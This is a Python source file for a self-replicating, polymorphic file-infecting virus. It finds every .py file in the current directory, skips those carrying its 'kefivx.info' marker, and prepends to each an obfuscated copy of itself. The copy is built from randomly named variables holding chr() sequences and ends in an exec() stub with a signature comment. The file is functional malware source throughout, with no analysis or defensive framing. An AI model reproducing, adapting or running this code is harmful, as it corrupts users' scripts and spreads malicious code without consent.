#!/usr/bin/python

from random import *
from glob import glob

def makevar():
    var = ''
    for i in range(3, randint(5, 15)):
        var += chr(65 + randint(1, 25))
        if randrange(1, 3) == 2:
            var += str(randint(0, 9))
    return  var

def getblock(code, pos, length):
    block = ''
    p = 0
    for i in range(pos, (pos + length)):
        p += 1
        block += 'chr(' + rndspace() + str(ord(code[i])) + rndspace() + ')'
        if p != length:
            block += rndspace() + '+' + rndspace()
    return  block

def rndspace():
    s = ''
    for i in range(0, randint(1, 7)):
        s += ' '
    return  s

vircode = xxx

for goat in glob("*.py"):
    fp = open(goat, 'r')
    goatcode = fp.read()
    fp.close()

    if goatcode.find("kefivx.info") == -1:
        newcode = ''
        indent = randint(0, 1)
        key = ''
        if indent == True:
            key = '\t'
        key += 'str(' + rndspace()
        current = 0
        pos = 0
        left = len(vircode)

        while left > 5:
            current = randrange(2, 6)
            left -= current
            codeblock = getblock(vircode, pos, current)
            pos = pos + current
            var = makevar()
            if indent == True:
                newcode += "\t"
            newcode += "%s%s=%s%s\n" % (var, rndspace(), rndspace(), codeblock)
            key += "str(%s%s%s)%s+%s" % (rndspace(), var, rndspace(), rndspace(), rndspace())

        var = makevar()
        codeblock = getblock(vircode, pos, left)
        if indent == True:
            newcode += "\t"
        newcode += "%s%s=%s%s\n" % (var, rndspace(), rndspace(), codeblock)
        key += "str(%s%s%s))" % (rndspace(), var, rndspace())

        nextgen = "#!/usr/bin/python\n"
        if indent == True:
            d = randint(0, 999)
            nextgen += "if %d == %d:\n" % (d, d)
        nextgen += "%s\n\n" % newcode
        if indent == True:
            nextgen += "\t"
        nextgen += "xxx%s=%s%s\n" % (rndspace(), rndspace(), key)
        if indent == True:
            nextgen += "\t"
        nextgen += "exec(%sxxx%s)\n" % (rndspace(), rndspace())
        if indent == True:
            nextgen += "\t"
        nextgen += "#%slame.c%s|%s55 Choas, 3176%s|%skefivx.info\n\n\n" % (rndspace(), rndspace(), rndspace(), rndspace(), rndspace())

        fp = open(goat, 'w')
        fp.write(nextgen)
        fp.write(goatcode)
        fp.close()
